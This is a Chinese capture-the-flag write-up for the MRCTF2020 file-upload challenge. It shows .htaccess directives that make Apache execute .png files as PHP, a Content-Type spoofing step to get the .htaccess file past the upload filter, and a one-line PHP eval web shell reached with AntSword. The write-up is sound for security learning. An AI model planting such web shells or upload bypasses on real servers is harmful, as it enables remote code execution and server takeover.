[MRCTF2020]你传你🐎呢之.htaccess
前言
最近,也是遇到了文件上传的文件,自己搭的靶场都不能用,今天,在这里又遇到了这个题。简单总结下,内容来自互联网,若有侵权,联系我。
.htaccess简介
.htaccess文件(分布式配置文件),提供了针对目录改变配置的方法, 就是在一个特定的文件目录中放置一个包含多个指令的文件,以作用于此
目 录及其子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache 的allowOverride指令来设置。httpd.conf文件中设置
.htaccess的利用
将下面的内容写入.htaccess
0x01
这里时是要包含bbb的文件,都会被当成php代码执行
<FilesMatch "bbb"> SetHandler application/x-httpd-php </FilesMatch>
0x02
这种方法时,后面的.png文件能被当成php代码执行,如果想换成别的改扩展名就可以
AddType application/x-httpd-php .png
赛题详解
这里我们的思路是,将.htaccess文件上传时,抓包,然后改Content-Type的类型为 image/jpeg的形式上传,当然这道题,image/png的
文件类型也可以上传,至于gif可不可以我没有试,感觉应该可以。然后先上传.htaccess文件,然后上传图片🐎,通过蚁剑去连接。好了,
废话不多说了下面我们开始做题吧
0x01 上传.htaccess文件
来到题目的页面,我们上传.htaccess,然后抓包改Content-Type的值,改成image/jpeg,然后放包。这里我们用的是第二种
0x02 上传图片🐎
改完之后,我们再继续上传图片🐎就可以。当然要是以.png的后缀名文件。
bbb.png内容:
<?php eval($_POST['hack']);?>
我们在这里上传的是bbb.png文件
得到这个路径,我们需要的是首页的url拼接上upload后面的路径:/upload/4c1f01c73cb453aec997d1699d8f0e75/bbb.png
0x03 蚁剑连接
然后通过蚁剑连接,密码为hack。然后在根目录下发现flag
这样,我们这道题就完成了。
总结一下,对这个.htaccess又加深了了解,不错,头疼了好几天,之前上传这个没一个成功的。好了谢谢大家的观看。觉得好的可以给个推荐,什么的。
